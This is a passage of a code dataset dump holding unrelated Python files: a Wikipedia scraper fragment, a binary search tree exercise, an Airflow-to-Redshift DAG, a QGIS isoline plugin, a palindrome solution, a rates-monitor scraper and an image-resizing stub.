start=page.find(\"
        \")\n end=page.find(\"
      \")\n infos=page[start:end]\n rep=[]\n url=\"\"\n temp=infos.split(\"\\n\")\n for i in range(len(temp)):\n p = re.compile(r'\\\" title.*$')\n url = p.sub('',temp[i])\n p = re.compile(r'
        \\n')\n url = p.sub('',url)\n p = re.compile(r'
      • \")\n end=page.find(\"Sommaire\")\n infos=page[start:end]\n return infos\n\ndef getData(texte,typeInfo):\n error=\"\"\n quest=\"\"\n fct=\"Web.getData\"\n data=\"\"\n res=\"\"\n codeErreur=0\n ltypeInfo=typeInfo.split(\" \")\n infos=getWikiInfos(texte)\n search=\"ok\"\n if re.search(\"Cette page d’homonymie répertorie les différents sujets et articles partageant un même nom.\",infos):\n codeErreur=0\n error=\"homonymie\"\n search=\"non\"\n rep=demandeChoix(infos)\n quest=\"Plusieurs choix correspondent à votre demande: \"+texte\n mrep=\"\"\n i=0\n while i < len(rep):\n mrep+=str(i)+\"-\"+str(rep[i])+\"\\n\"\n i=i+1\n quest=quest+\"\\nQuel est votre choix?\\n\"+mrep\n if search==\"ok\":\n itab=0\n if re.search(\"bandeau-titre\",infos):\n itab=itab+infos.count(\"bandeau-titre\")\n tableau=infos.split(\"\\n\")\n for i in range(len(ligne)):\n e=0\n for j in range(len(ltypeInfo)):\n if re.search(ltypeInfo[j]+\"[<|\\b*]\",ligne[i],flags=re.IGNORECASE):\n e=e+1\n if e == len(ltypeInfo):\n res=ligne[i]\n try:\n temp=res.split(\"\\n') \n data = p.sub('',temp[1])\n except:\n temp=res.split(\"\\n') \n data = p.sub('',temp[1])\n p2 = re.compile(r'\\[.*?\\]')\n data = p2.sub('',data)\n p3 = re.compile(r'\\(.*?\\)')\n data = p3.sub('',data)\n p4 = re.compile(r'&#[0-9]{3};')\n data = p4.sub(' ',data)\n p5 = re.compile(r'.*?>')\n data = p5.sub(' ',data)\n codeErreur=1\n if re.search(\"hab.\",data.strip()):\n res=data.strip()[:-5]\n else:\n res=data.strip() \n return codeErreur,error,quest,fct,res\n\n\"\"\"nom=input(\"Entrer le nom de ce sur quoi vous voulez des infos: \")\ntypeInfo=input(\"Entrer le type d'info voulu: \")\nres=getData(nom,typeInfo)\nprint(res[1])\n\"\"\"\n","sub_path":"server/Web.py","file_name":"Web.py","file_ext":"py","file_size_in_byte":4138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"427544569","text":"class Node: \n def __init__(self,key): \n self.left = None\n self.right = None\n self.val = key\n\n def insert(self,root,node):\n if root is None:\n root = node \n else: \n if root.val < node.val:\n if root.right is None:\n root.right = node \n else:\n self.insert(root.right, node)\n else:\n if root.left is None:\n root.left = node\n else:\n self.insert(root.left, node)\n\n def IsPresent(self, root, value):\n if not root:\n return False\n if root.val == value:\n return True\n if root.val > value:\n return self.IsPresent(root.left, value)\n return self.IsPresent(root.right, value)\n\n#Create BST\nr = Node(50) \nr.insert(r,Node(30)) \nr.insert(r,Node(20)) \nr.insert(r,Node(40)) \nr.insert(r,Node(70)) \nr.insert(r,Node(60)) \nr.insert(r,Node(80))\n\nTestData = [\n 10,20,30,40,50,100\n ]\n\ndef Test_BST(data,bst):\n for i,dt in enumerate(data):\n res = bst.IsPresent(bst,dt)\n print(i,res)\n\n\nTest_BST(TestData,r)\n\n\n# search BST 30 min\n# solve 15 min","sub_path":"interviews/engie-lab/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"483090226","text":"import tensorflow.compat.v1 as tf # pycharm says there is no compat module in tensorflow, which is wrong\nimport matplotlib.pyplot as plt\nimport glob\n\n\ndef get_section_results(file):\n \"\"\"\n requires tensorflow==1.12.0\n \"\"\"\n X = []\n Y = []\n # for e in tf.data.TFRecordDataset(file):\n # print(e)\n for e in tf.train.summary_iterator(file):\n for v in e.summary.value:\n if v.tag == 'Train_EnvstepsSoFar':\n X.append(v.simple_value)\n elif 
v.tag == 'Eval_AverageReturn':\n Y.append(v.simple_value)\n return X, Y\n\n\ndef get_X_Y(logdir, line_width):\n eventfile = glob.glob(logdir)[0]\n\n X, Y = get_section_results(eventfile)\n # X_Y = zip(X, Y)\n X_Y = [X, Y]\n plt.plot(X, Y, linewidth=line_width)\n plt.show()\n # for i, (x, y) in enumerate(zip(X, Y)):\n # print('Iteration {:d} | Train steps: {:d} | Return: {}'.format(i, int(x), y))\n return X_Y\n\n\nif __name__ == '__main__':\n\n\n logdir = '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_ac_1_1-ntu_CartPole-v0_21-10-2020_20-04-38/events*'\n logdirs = [\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_ac_1_1-ntu_CartPole-v0_21-10-2020_20-04-38',\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_100_1_CartPole-v0_21-10-2020_20-08-47',\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_1_100_CartPole-v0_21-10-2020_20-08-57',\n '/git/py.code/hw3/homework_fall2020/hw3/cs285/scripts/../data/hw3_q4_10_10_CartPole-v0_21-10-2020_20-04-35'\n ]\n logdirs = [i + \"/events*\" for i in logdirs]\n X_Y_list = []\n line_width = 0.5\n for logdir in logdirs:\n print(line_width)\n X_Y_list.append(get_X_Y(logdir, line_width=line_width))\n line_width += 0.5\n plt.show()\n","sub_path":"hw3/cs285/scripts/read_results.py","file_name":"read_results.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"147478512","text":"from datetime import datetime, timedelta\nimport logging\nimport os\nfrom operators import *\nfrom helpers import *\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow import DAG\nfrom airflow import settings\nfrom airflow.models import Connection\nfrom aws_configuration_parser import *\nfrom airflow.operators.python_operator import PythonOperator\n\n\n# creating aws configuration object\naws_configs = AwsConfigs(f\"{os.environ['AIRFLOW_HOME']}/credentials/credentials.csv\", \n f\"{os.environ['AIRFLOW_HOME']}/credentials/resources.cfg\")\n\n# Creating redshift connection\nredshift_conn = Connection(conn_id='redshift',\n conn_type='postgres',\n host=aws_configs.REDSHIFT['endpoint'],\n login=aws_configs.REDSHIFT['db_user'],\n password=aws_configs.REDSHIFT['db_password'],\n schema=aws_configs.REDSHIFT['db_name'],\n port=aws_configs.REDSHIFT['port']\n )\n\n# Creating aws connection\naws_conn = Connection(conn_id='aws_credentials',\n conn_type='aws',\n login=aws_configs.ACCESS_KEY,\n password=aws_configs.SECRET_KEY\n )\n\nsession = settings.Session() # get the session\nsession.add(redshift_conn)\nsession.add(aws_conn)\n\nsession.commit() # it will insert the connection object programmatically.\n\n\n\ndefault_args = {\n 'owner': 'naqeeb',\n 'depends_on_past': False,\n 'catchup': False,\n 'start_date': datetime(2020, 3, 1),\n 'retries': 3,\n 'retry_delay': timedelta(minutes=1)\n}\n\ndag = DAG(\n 'udacity-capstone-project',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='@hourly'\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\nending_operator = DummyOperator(task_id='End_execution',dag=dag)\n# creating a list of tables\ntables = ['forces','neighborhoods','crimes','date','senior_officers',\n 'neighborhood_locations','neighborhood_boundaries','outcomes']\n\n# path S3 which each staging table is loaded\nstaging_tables_dict = {}\n\nfor table in tables:\n if table == 'date':\n continue\n elif table in 
['crimes','outcomes']:\n prefix = aws_configs.S3['real_processed_key']\n else:\n prefix = aws_configs.S3['batched_process_key']\n staging_tables_dict[table] = (f\"{prefix}/{table}\",getattr(CreateTableQueries,f\"staging_{table}_table_create\"))\n\nstaging_to_redshift_operations = {}\n\nfor table,(s3_key,create_table_stmt) in staging_tables_dict.items():\n staging_to_redshift_operations[table] = StageToRedshiftOperator(\n task_id=f'Stage_{table}',\n dag=dag,\n redshift_conn_id='redshift',\n aws_credentials_id ='aws_credentials',\n table=f'staging_{table}',\n s3_bucket=aws_configs.S3['BUCKET'],\n s3_key=s3_key,\n region=aws_configs.REGION,\n file_type='JSON',\n create_table_stmt=create_table_stmt,\n drop_table = True\n )\n\ntable_insert_operations = {}\nfor table in tables[:4]:\n if table == 'forces':\n sql_stmt = SQLQueries.stage_table_insert.format(source=f\"staging_{table}\",\n cols=\"*\",\n target=f\"dim_{table}\")\n else:\n sql_stmt = getattr(SQLQueries,f\"{table}_table_insert\")\n table_insert_operations[table] = LoadDimensionOperator(\n task_id=f'Load_{table}_dim_table',\n dag=dag,\n redshift_conn_id='redshift',\n table=f\"dim_{table}\",\n sql_stmt=sql_stmt,\n create_table_stmt=getattr(CreateTableQueries,f\"dim_{table}_table_create\")\n ) \n\nfor table in tables[4:7]:\n insert_stmt = getattr(SQLQueries,f\"{table}_insert_stmt\")\n sql_stmt = SQLQueries.stage_table_insert.format(source=f\"staging_{table}\",\n cols= ','.join(getattr(SQLQueries,f\"{table}_cols\")),\n target=table)\n table_insert_operations[table] = LoadDimensionOperator(\n task_id=f'Load_{table}_table',\n dag=dag,\n redshift_conn_id='redshift',\n table=table,\n insert_stmt=insert_stmt,\n sql_stmt=sql_stmt,\n create_table_stmt=getattr(CreateTableQueries,f\"{table}_table_create\")\n )\n\ntable_insert_operations['outcomes'] = LoadFactOperator(\n task_id=f'Load_fact_outcomes_table',\n dag=dag,\n redshift_conn_id='redshift',\n table=\"fact_outcomes\",\n sql_stmt=SQLQueries.outcomes_table_insert,\n insert_stmt=SQLQueries.outcomes_insert_stmt,\n create_table_stmt= CreateTableQueries.fact_outcomes_table_create\n )\n\ndata_quality_operations = {}\nfor table in ['forces','neighborhoods','crimes','date']:\n data_quality_operations[table] = DataQualityOperator(\n task_id=f'Run_data_quality_checks_dim_{table}',\n dag=dag,\n redshift_conn_id='redshift',\n table = f\"dim_{table}\"\n )\n\nfor table in ['senior_officers','neighborhood_locations','neighborhood_boundaries']:\n data_quality_operations[table] = DataQualityOperator(\n task_id=f'Run_data_quality_checks_{table}',\n dag=dag,\n redshift_conn_id='redshift',\n table = table\n )\n\ndata_quality_operations['outcomes'] = DataQualityOperator(\n task_id=f'Run_data_quality_checks_fact_outcomes',\n dag=dag,\n redshift_conn_id='redshift',\n table = 'fact_outcomes'\n ) \n\nstart_operator >> [operation for key,operation in staging_to_redshift_operations.items()]\n\n[staging_to_redshift_operations[table] for table in ['forces','senior_officers']] >> table_insert_operations['forces']\n[staging_to_redshift_operations[table] for table in ['neighborhoods',\n 'neighborhood_locations',\n 'neighborhood_boundaries']] >> table_insert_operations['neighborhoods']\n \nstaging_to_redshift_operations['crimes'] >> table_insert_operations['crimes']\n[staging_to_redshift_operations['crimes'],staging_to_redshift_operations['outcomes']] >> table_insert_operations['date']\n\nfor table in ['forces','neighborhoods','crimes','date']:\n table_insert_operations[table] >> table_insert_operations['outcomes']\n for 
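# --- Hedged sketch (editor's addition): the DAG above builds operators in
# dicts keyed by table name and wires them with `>>`. The skeleton of that
# pattern, reduced to DummyOperator so it needs nothing project-specific
# (table names are placeholders):
from datetime import datetime
from airflow import DAG
from airflow.operators.dummy_operator import DummyOperator

dag = DAG('pattern_demo', start_date=datetime(2020, 3, 1), schedule_interval=None)

stage = {t: DummyOperator(task_id='stage_%s' % t, dag=dag) for t in ['forces', 'crimes']}
load = {t: DummyOperator(task_id='load_%s' % t, dag=dag) for t in ['forces', 'crimes']}

for t in stage:
    stage[t] >> load[t]  # each staging task feeds its load task
[load[t] for t in load] >> DummyOperator(task_id='quality_checks', dag=dag)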
other_tables in tables[4:7]:\n table_insert_operations[table] >> table_insert_operations[other_tables]\n\nfor table in tables:\n table_insert_operations[table] >> data_quality_operations[table]\n\nfor table in tables:\n data_quality_operations[table] >> ending_operator\n","sub_path":"capstone-project/dags/udacity-capstone-project.py","file_name":"udacity-capstone-project.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"251356859","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/***************************************************************************\n Location Lab\n A QGIS plugin\n Perform Location Intelligence analysis in QGIS environment\n -------------------\n begin : 2017-07-10\n copyright : (C) 2017 by Sebastian Schulz / GIS Support\n email : sebastian.schulz@gis-support.pl\n git sha : $Format:%H$\n ***************************************************************************/\n\n/***************************************************************************\n * *\n * This program is free software; you can redistribute it and/or modify *\n * it under the terms of the GNU General Public License as published by *\n * the Free Software Foundation; either version 2 of the License, or *\n * (at your option) any later version. *\n * *\n ***************************************************************************/\n This script initializes the plugin, making it known to QGIS.\n\"\"\"\nfrom PyQt4 import uic\nfrom PyQt4.QtCore import QSettings, Qt, QVariant\nfrom PyQt4.QtGui import QDialog, QDialogButtonBox, QDockWidget\nfrom qgis.gui import QgsMapLayerComboBox, QgsMapLayerProxyModel, QgsMessageBar\nfrom qgis.core import QgsCoordinateTransform, QgsCoordinateReferenceSystem, \\\n QgsGeometry, QgsField, QgsMapLayerRegistry, QgsVectorLayer, QgsFeature, \\\n QgsPoint\nimport os.path\nimport locale\nimport urllib2\nimport json\n\nlocale.setlocale(locale.LC_ALL, '')\nFORM_CLASS, _ = uic.loadUiType(os.path.join(\n os.path.dirname(__file__), 'catchments_module.ui'))\n\nHERE_PARAMS = {\n 'Car': 'car',\n 'Pedestrian': 'pedestrian',\n 'Truck': 'truck'\n}\n\nclass CatchmentsModule(QDockWidget, FORM_CLASS):\n def __init__(self, parent, parents=None):\n super(CatchmentsModule, self).__init__(parents)\n self.setupUi(self)\n self.parent = parent\n self.iface = parent.iface\n self.fillDialog()\n\n def fillDialog(self):\n self.layerComboBox = QgsMapLayerComboBox(self)\n self.layerComboBox.setObjectName('layerComboBox')\n self.layerComboBox.setFilters(QgsMapLayerProxyModel.PointLayer)\n self.layersLayout.addWidget(self.layerComboBox)\n self.providersComboBox.addItems(['Skobbler', 'HERE'])\n self.modesComboBox.addItems(['Car', 'Bike', 'Pedestrian'])\n self.unitsComboBox.addItems(['Minutes', 'Meters'])\n self.valueSpinBox.setMinimum(1)\n self.valueSpinBox.setMaximum(99999)\n self.valueSpinBox.setValue(10)\n self.getCatchments.setEnabled(False)\n self.getKeyLabel.setText('
Get key
        '\n )\n self.connectFunctions()\n self.loadKey()\n\n def connectFunctions(self):\n self.providersComboBox.currentIndexChanged.connect(self.changeProvider)\n self.keyLineEdit.textChanged.connect(self.saveKey)\n self.layerComboBox.currentIndexChanged.connect(self.changeLayerEvent)\n self.modesComboBox.currentIndexChanged.connect(self.disableUnnecessaryParams)\n self.selectCheckBox.stateChanged.connect(self.updateFeaturesQuantity)\n self.getCatchments.clicked.connect(self.run)\n\n def disableUnnecessaryParams(self):\n if self.modesComboBox.currentText() == 'Pedestrian':\n self.trafficCheckBox.setEnabled(False)\n self.highwaysCheckBox.setEnabled(False)\n self.tollsCheckBox.setEnabled(False)\n self.highwaysCheckBox.setChecked(False)\n self.tollsCheckBox.setChecked(False)\n self.trafficCheckBox.setChecked(False)\n elif self.providersComboBox.currentText() == 'Skobbler':\n self.trafficCheckBox.setEnabled(False)\n self.highwaysCheckBox.setEnabled(True)\n self.tollsCheckBox.setEnabled(True)\n elif self.providersComboBox.currentText() == 'HERE':\n self.trafficCheckBox.setEnabled(True)\n self.highwaysCheckBox.setEnabled(False)\n self.tollsCheckBox.setEnabled(False)\n\n def changeProvider(self):\n self.modesComboBox.clear()\n if self.providersComboBox.currentText() == 'Skobbler':\n items = ['Car', 'Bike', 'Pedestrian']\n self.highwaysCheckBox.setEnabled(True)\n self.tollsCheckBox.setEnabled(True)\n self.trafficCheckBox.setEnabled(False)\n self.trafficCheckBox.setChecked(False)\n self.getKeyLabel.setText('
Get key
        '\n )\n self.keyLineEdit.setPlaceholderText('Insert Api Code')\n elif self.providersComboBox.currentText() == 'HERE':\n items = ['Car', 'Pedestrian', 'Truck']\n self.trafficCheckBox.setEnabled(True)\n self.highwaysCheckBox.setEnabled(False)\n self.highwaysCheckBox.setChecked(False)\n self.tollsCheckBox.setChecked(False)\n self.tollsCheckBox.setEnabled(False)\n self.getKeyLabel.setText('
Get key
        '\n )\n self.keyLineEdit.setPlaceholderText('Insert App ID and App Code separated by \\':\\'')\n self.modesComboBox.addItems(items)\n self.loadKey()\n\n def saveKey(self):\n value = 'gissupport/location_lab/{}'.format(self.providersComboBox.currentText())\n QSettings().setValue(value, self.keyLineEdit.text())\n\n def loadKey(self):\n value = 'gissupport/location_lab/{}'.format(self.providersComboBox.currentText())\n self.keyLineEdit.setText(QSettings().value(value) or '')\n\n def getPoints(self, vl, features):\n trans = QgsCoordinateTransform(vl.crs(), QgsCoordinateReferenceSystem(4326))\n points = []\n for f in features:\n geom = f.geometry()\n geom.transform(trans)\n if geom.isMultipart():\n points.append(geom.asMultiPoint()[0])\n else:\n points.append(geom.asPoint())\n return points\n\n def requestApi(self, points):\n polygons = []\n not_found = 0\n if self.providersComboBox.currentText() == 'Skobbler':\n \"\"\"\n Skobbler options:\n start string Center of RealReach™ in GPS coordinates: Latitude, Longitude\n transport string You can pick one of the transport options: pedestrian, bike, car\n range int The range for which we calculate RealReach™\n units string You can choose between sec and meter. 'Sec' is for time and 'Meter' is for distance\n toll boolean You can specify whether to avoid or not the use of toll roads in route calculation\n highways boolean Specifies whether to avoid or not the use of highways in route calculation\n \"\"\"\n for p in points:\n params = {\n 'source': self.providersComboBox.currentText(),\n 'url': 'tor.skobbler.net/tor/RSngx/RealReach/json/20_5/en',\n 'key': self.keyLineEdit.text().strip(),\n 'start': '{x},{y}'.format(x=p[1], y=p[0]),\n 'transport': self.modesComboBox.currentText().lower(),\n 'range': self.valueSpinBox.value() if self.unitsComboBox.currentText() == 'Meters' else self.valueSpinBox.value() * 60,\n 'units': 'meter' if self.unitsComboBox.currentText() == 'Meters' else 'sec',\n 'nonReachable': '0',\n 'toll': '1' if self.tollsCheckBox.isChecked() else '0',\n 'highways': '1' if self.highwaysCheckBox.isChecked() else '0',\n 'response_type': 'gps'\n }\n link = 'http://{key}.{url}/{key}\\\n ?start={start}\\\n &transport={transport}\\\n &range={range}\\\n &units={units}\\\n &nonReachable={nonReachable}\\\n &toll={toll}\\\n &highways={highways}\\\n &response_type={response_type}'.replace(' ', '').format(**params)\n try:\n r = urllib2.urlopen(link)\n except urllib2.HTTPError as e:\n return 'invalid key'\n continue\n data = json.loads(r.read())\n if data['status']['apiMessage'] == 'Route cannot be calculated.':\n not_found += 1\n continue\n params['coordinates'] = data['realReach']['gpsPoints']\n polygons.append(params)\n elif self.providersComboBox.currentText() == 'HERE':\n \"\"\"\n HERE options:\n start string lat and lng\n mode string car, pedestrian or truck\n range int range for calculations\n rangetype string distance, time, consumption\n traffic boolean takes traffic\n \"\"\"\n for p in points:\n params = {\n 'source': self.providersComboBox.currentText(),\n 'url': 'http://isoline.route.cit.api.here.com/routing/7.2/calculateisoline.json',\n 'key': self.keyLineEdit.text().strip().split(':'),\n 'start': '{x},{y}'.format(x=p[1], y=p[0]),\n 'transport': HERE_PARAMS[self.modesComboBox.currentText()],\n 'range': self.valueSpinBox.value() if self.unitsComboBox.currentText() == 'Meters' else self.valueSpinBox.value() * 60,\n 'units': 'distance' if self.unitsComboBox.currentText() == 'Meters' else 'time',\n 'traffic': 'enabled' if 
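# --- Hedged sketch (editor's addition): the request links above are built by
# formatting a long template and stripping the embedded spaces. urlencode
# does the same job without the whitespace gymnastics; the parameters here
# are illustrative, not the full HERE API contract.
try:
    from urllib import urlencode        # Python 2, which this PyQt4 plugin targets
except ImportError:
    from urllib.parse import urlencode  # Python 3

params = {'start': 'geo!52.5,13.4', 'range': 600, 'rangetype': 'time'}
link = ('http://isoline.route.cit.api.here.com/routing/7.2/calculateisoline.json?'
        + urlencode(params))
print(link)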
self.trafficCheckBox.isChecked() else 'disabled'\n }\n link = '{url}\\\n ?app_id={key[0]}\\\n &app_code={key[1]}\\\n &mode=fastest;{transport};traffic:{traffic}\\\n &start=geo!{start}\\\n &range={range}\\\n &rangetype={units}'.replace(' ', '').format(**params)\n try:\n r = urllib2.urlopen(link)\n except urllib2.HTTPError as e:\n return 'invalid key'\n continue\n if r.getcode() == 403:\n return 'forbidden'\n params['coordinates'] = json.loads(r.read())['response']['isoline'][0]['component'][0]['shape']\n polygons.append(params)\n if polygons and not_found:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'{} catchments not found'.format(not_found),\n level=QgsMessageBar.INFO)\n return polygons\n\n def addPolygonsToMap(self, polygons):\n if not QgsMapLayerRegistry.instance().mapLayersByName('Location Lab - catchments'):\n vl = QgsVectorLayer('Polygon?crs=EPSG:4326', 'Location Lab - catchments', 'memory')\n pr = vl.dataProvider()\n vl.startEditing()\n pr.addAttributes(\n [\n QgsField('id', QVariant.Int),\n QgsField('provider', QVariant.String),\n QgsField('mode', QVariant.String),\n QgsField('value', QVariant.Int),\n QgsField('units', QVariant.String),\n QgsField('lat', QVariant.Double),\n QgsField('lon', QVariant.Double),\n QgsField('params', QVariant.String)\n ]\n )\n vl.commitChanges()\n QgsMapLayerRegistry.instance().addMapLayer(vl)\n vl = QgsMapLayerRegistry.instance().mapLayersByName('Location Lab - catchments')[0]\n pr = vl.dataProvider()\n next_id = len(vl.allFeatureIds()) + 1\n for p in polygons:\n feature = QgsFeature()\n points = []\n if p['source'] == 'Skobbler':\n coordinates_x = [c for c in p['coordinates'][8::2]]\n coordinates_y = [c for c in p['coordinates'][9::2]]\n for x, y in zip(coordinates_x, coordinates_y):\n points.append(QgsPoint(x, y))\n elif p['source'] == 'HERE':\n coordinates = [c.split(',') for c in p['coordinates']]\n for xy in coordinates:\n points.append(QgsPoint(float(xy[1]), float(xy[0])))\n feature = QgsFeature()\n feature.setGeometry(QgsGeometry.fromPolygon([points]))\n lat, lon = p['start'].split(',')\n for key in ['key', 'url', 'coordinates', 'start']: #unnecessary params\n p.pop(key)\n feature.setAttributes([\n next_id,\n self.providersComboBox.currentText(),\n self.modesComboBox.currentText().lower(),\n self.valueSpinBox.value(),\n self.unitsComboBox.currentText(),\n float(lat),\n float(lon),\n str(p)\n ])\n pr.addFeatures([feature])\n next_id += 1\n vl.updateExtents()\n self.iface.mapCanvas().setExtent(\n QgsCoordinateTransform(\n vl.crs(),\n self.iface.\n mapCanvas().\n mapRenderer().\n destinationCrs()).\n transform(vl.extent()))\n self.iface.mapCanvas().refresh()\n\n def changeLayerEvent(self):\n vl = self.layerComboBox.currentLayer()\n if not vl:\n return\n self.updateFeaturesQuantity()\n vl.selectionChanged.connect(self.updateFeaturesQuantity)\n\n def updateFeaturesQuantity(self):\n vl = self.layerComboBox.currentLayer()\n if not vl:\n return\n if self.selectCheckBox.isChecked():\n features = [f for f in vl.selectedFeatures()]\n else:\n features = [f for f in vl.getFeatures()]\n self.pointsLabel.setText('Number of points: {}'.format(len(features)))\n if len(features) > 5:\n self.getCatchments.setEnabled(False)\n self.pointsLabel.setText('Number of points: {} (limit is 5)'.format(len(features)))\n elif len(features) == 0:\n self.getCatchments.setEnabled(False)\n else:\n self.getCatchments.setEnabled(True)\n\n def show(self):\n self.changeLayerEvent()\n self.iface.addDockWidget(Qt.LeftDockWidgetArea, self)\n super(CatchmentsModule, 
self).show()\n\n def checkApiKey(self):\n if self.providersComboBox.currentText() == 'HERE':\n if len(self.keyLineEdit.text().split(':')) != 2:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'Invalid api key format, required app_id:app_code',\n level=QgsMessageBar.WARNING)\n return False\n return True\n\n def run(self):\n vl = self.layerComboBox.currentLayer()\n if self.selectCheckBox.isChecked():\n features = [f for f in vl.selectedFeatures()]\n else:\n features = [f for f in vl.getFeatures()]\n if not features:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'No geometry',\n level=QgsMessageBar.WARNING)\n return\n points = self.getPoints(vl, features)\n if not self.checkApiKey():\n return\n polygons = self.requestApi(points)\n if not polygons:\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'Catchments not found',\n level=QgsMessageBar.WARNING)\n return\n elif polygons == 'invalid key':\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'Invalid API key',\n level=QgsMessageBar.WARNING)\n return \n elif polygons == 'forbidden':\n self.iface.messageBar().pushMessage(\n u'Catchments',\n u'These credentials do not authorize access',\n level=QgsMessageBar.WARNING)\n return \n self.addPolygonsToMap(polygons)","sub_path":"catchments_module.py","file_name":"catchments_module.py","file_ext":"py","file_size_in_byte":17023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"370213540","text":"class Solution:\n \"\"\"\n @param s: a string which consists of lowercase or uppercase letters\n @return: the length of the longest palindromes that can be built\n \"\"\"\n def longestPalindrome(self, s):\n #put string to list for sort\n listS = list(s)\n #sort list so that the same char will be together\n listS.sort()\n #to save the result\n result = []\n loopPosition = 0\n palindromeLength = 0\n while loopPosition < len(listS)-1:\n #if the char are same and the number is even, keep both\n #else keep finding the paired char\n if listS[loopPosition] == listS[loopPosition+1]:\n loopPosition+=2\n palindromeLength+=2\n else:\n loopPosition+=1\n \n #if palindrome length less the the original length\n #that means we have char not in pair, which we can add to middle\n #else all char are in pair and just return palindrome length \n if palindromeLength < len(listS):\n return palindromeLength+1\n else:\n return palindromeLength\n \n","sub_path":"Python_Solutions/longestPalindrome.py","file_name":"longestPalindrome.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"81363509","text":"from bs4 import BeautifulSoup\nfrom lxml import html\nimport pandas as pd\nimport requests\nimport json\nimport re\nimport time\nimport logging\nimport asyncio\nfrom timeit import default_timer\nfrom concurrent.futures import ThreadPoolExecutor\nimport hertzcommons as hc\n\n#logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogging.basicConfig(level=logging.INFO, filename='hertCacl.log', filemode='w', format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n\n\nSTART_TIME = default_timer()\n\ndef extracRateCel(columns):\n rateEngineTotal = {}\n\n if len(columns) > 2:\n #print(columns)\n rateEngineTotal['total'] = hc.convertToFloat((columns[1].get_text()).strip())\n rateEngineTotal['app'] = hc.convertToFloat((columns[2].get_text()).strip())\n rateEngineTotal['db'] = 
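# --- Hedged sketch (editor's addition): the longestPalindrome solution above
# sorts the string and walks adjacent pairs. Counting characters gives the
# same answer without sorting: each full pair contributes 2, and one
# leftover character may sit in the middle.
from collections import Counter

def longest_palindrome_length(s):
    pairs = sum(count // 2 for count in Counter(s).values())
    length = 2 * pairs
    return length + 1 if length < len(s) else length

assert longest_palindrome_length('abccccdd') == 7
assert longest_palindrome_length('aabb') == 4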
hc.convertToFloat((columns[3].get_text()).strip())\n rateEngineTotal['gdd'] = hc.convertToFloat((columns[4].get_text()).strip())\n rateEngineTotal['rules'] = hc.convertToFloat((columns[5].get_text()).strip())\n rateEngineTotal['txn'] = hc.convertToFloat((columns[6].get_text()).strip())\n rateEngineTotal['tps'] = hc.convertToFloat((columns[7].get_text()).strip())\n\n return rateEngineTotal\n\ndef processCalcTable(cellTable):\n rows = cellTable.find_all('tr')\n return extracRateCel(rows[9].find_all('td'))\n\ndef processRateCalc(data_source, source):\n soup = BeautifulSoup(source,'lxml')\n cellTables = soup.find_all('table')\n print('cell tables', len(cellTables))\n \n #processSimple(cellTables[15])\n\n allEngines = {}\n allEngines['WASCell_01_DCDB6'] = processCalcTable(cellTables[2])\n allEngines['WASCell_02_DCDB7'] = processCalcTable(cellTables[4])\n allEngines['WASCell_03_DCDB8'] = processCalcTable(cellTables[6])\n allEngines['WASCell_04_DCDB9'] = processCalcTable(cellTables[8])\n allEngines['WASCell_05_DCDB10'] = processCalcTable(cellTables[10])\n allEngines['WASCell_06_DCDB11'] = processCalcTable(cellTables[12])\n allEngines['WASCell_07_DCDB12'] = processCalcTable(cellTables[14])\n\n allEngines['WASCell_01_RCDB6'] = processCalcTable(cellTables[3])\n allEngines['WASCell_02_RCDB7'] = processCalcTable(cellTables[5])\n allEngines['WASCell_03_RCDB8'] = processCalcTable(cellTables[7])\n allEngines['WASCell_04_RCDB9'] = processCalcTable(cellTables[9])\n allEngines['WASCell_05_RCDB10'] = processCalcTable(cellTables[11])\n allEngines['WASCell_06_RCDB11'] = processCalcTable(cellTables[13])\n allEngines['WASCell_07_RCDB12'] = processCalcTable(cellTables[15])\n\n return allEngines\n\n\ndef processSimple(table):\n for row in table.find_all('tr'):\n for cell in row.find_all('td'):\n print(cell.get_text(), end=' ')\n print()\n return\n\ndef main():\n config = {}\n config['source']={}\n # the base URL if we need to repeat\n config['source']['base_url'] = 'https://ratesmonitor.hertz.com/RatesMonitoringWeb/calculatorpages/calcmonitoring.jsp?environment=prod'\n itemList = []\n # individual servers\n itemList.append({'name':'calcservers','url':''})\n config['source'][\"urls_to_fetch\"] = itemList\n\n config[\"data_processor\"] = processRateCalc\n config[\"splunk_source\"] = \"hertzCalcServers\"\n config[\"time_interval\"] = 30\n config[\"loop_count\"] = -1\n hc.scrapeData(config)\n \nmain()","sub_path":"extractor-calc-engine-hertz.py","file_name":"extractor-calc-engine-hertz.py","file_ext":"py","file_size_in_byte":3260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"10553235","text":"import numpy as np\nimport cv2\nimport sys\n\n\ndef shrinkImage(imagetoreduce):\n\theight, width = imagetoreduce.shape[:2]\n\tmax_height = 800\n\tmax_width = 800\n\n\t# only shrink if img is bigger than required\n\tif max_height < height or max_width < width:\n\t # get scaling factor\n\t print (\"Going 